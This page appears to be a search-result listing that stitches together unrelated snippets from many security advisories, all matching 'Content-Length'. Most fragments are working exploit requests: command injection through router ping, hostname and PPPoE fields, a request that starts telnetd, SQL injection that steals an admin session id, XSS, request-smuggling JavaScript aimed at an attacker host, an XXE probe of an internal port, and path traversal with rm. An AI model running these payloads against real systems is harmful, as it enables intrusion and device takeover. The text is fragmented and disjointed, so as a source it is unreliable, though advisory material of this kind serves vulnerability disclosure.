Next Page >>
Content/Length
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
Description:
It is possible to cause Apache HTTP server to return client-supplied scripting code by submitting a malformed HTTP method which would actually carry the payload (i.e.: malicious JavaScript) and invalid length data in the form of either of the following:
Two 'Content-length:' headers equals to zero. i.e.: "Content-Length: 0[LF]Content-Length: 0"
One 'Content-length:' header equals to two values. i.e.: "Content-length: 0, 0"
One 'Content-length:' header equals to a negative value. i.e.: "Content-length: -1"
One 'Content-length:' header equals to a large value. i.e.: "Content-length: 9999999999999999999999999999999999999999999999"
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
{"new_user_id":"9"}
Finding 2: SQL Injection
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip=
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF):
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.
[Bug Summary]
- Content-Length entity-header filed miscalculation.
[Impact]
- Low
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157
IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
SChannelState: 0
and is used in many Linux distributions and some VMware / Dell products.
[=] Vulnerabilities
* CVE-2010-1937 (SFCB bug #3001896) : pre-auth remote heap overflow
using a forged Content-Length header
When parsing a HTTP request, SFCB will use any positive Content-Length
value to allocate a buffer. Then, memcpy tries to copy the user-provided
POST data in this buffer. By sending a small value in the Content-Length
header and more data in the POST body, it's possible to overflow the
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Diagnostics.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;
__utmb=216871948.1.10.1317632284; __utmc=216871948;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
$packet .= $data;
sendpacket($packet,0,0,0);
/* Packet 3 --> Change Extension from .gif to .php */
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache
params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E
HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:30:05 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
HTTP Response Splitting
(Affected versions: Any)
E) "Cookie Dump Servlet" escape sequence injection
(Affected versions: Any)
F) Http Content-Length header escape sequence injection
(Affected versions: Any)
G) "Cookie Dump Servlet" stored XSS
(Affected versions: =<6.1.20)
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
if (x.readyState == 4){
}
}
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n") }catch(r){} }
-----------------------------------------------------
the request will become:
----------------------------------------------------
POST / HTTP/1.1
B. Heap-based Buffer Underflow (CVE-2009-0840)
Severity: Medium
By providing a specially-crafted POST request to the "mapserv" CGI
application, an out-of-bounds memory write can be triggered.
Specifically, by setting the "CONTENT_LENGTH" environment variable to
- -1, the code will write a zero byte to "data[ -1 ]", where "data" is a
character array allocated on the heap via malloc(3).
When the following is executed locally on the command line:
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs: A] GatewayService integer overflow
B] CmpWebServer stack overflow
C] CmpWebServer Content-Length NULL pointer
D] CmpWebServer invalid HTTP request NULL pointer
E] CmpWebServer folders creation
Exploitation: remote
Date: 29 Nov 2011
Author: Luigi Auriemma
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
cmd=telnetd;
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close
submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:
this to execute arbitrary code on the server via crafted id parameters.
CVE-2009-0840
An integer overflow leading to a heap-based buffer overflow when
processing the Content-Length header of an HTTP request can be used by an
attacker to execute arbitrary code via crafted POST requests containing
negative Content-Length values.
CVE-2009-2281
remotely-triggered crash.
The fix put in place fixed the possibility for the crash to be
triggered, but a possible denial of service still exists if an
attacker sends one or more HTTP POST requests with very large
Content-Length values.
[1]
http://downloads.asterisk.org/pub/security/AST-2012-014.html
Resolution Content-Length is now capped at a maximum value of 1024
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
----------
Proxy-Connection: keep-alive
Referer: http://192.168.0.1/BAS_pppoe.htm
Cookie: uid=vjkqK779eJ
Authorization: Basic xxxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
Connection: close
login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0
=> wait around 30 seconds till the configuration is saved and activated
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8
---snip---
<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />
* Connected to www.example.com (127.0.0.1) port 80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
ZDI-08-063: Novell eDirectory dhost.exe Content-Length Header Heap
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-063
October 8, 2008
-- CVE ID:
CVE-2008-4478
-- Affected Vendors:
Novell
C]
POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
Host: SERVER
Cookie: "use the real user's cookie!"
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
dir=..\..\..\file.txt
D]
POST /eh/chat.ehintf/C. HTTP/1.1
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_02
Host: xxxxxx.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Content-Length: 84
Connection: close
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Next Page>>
|
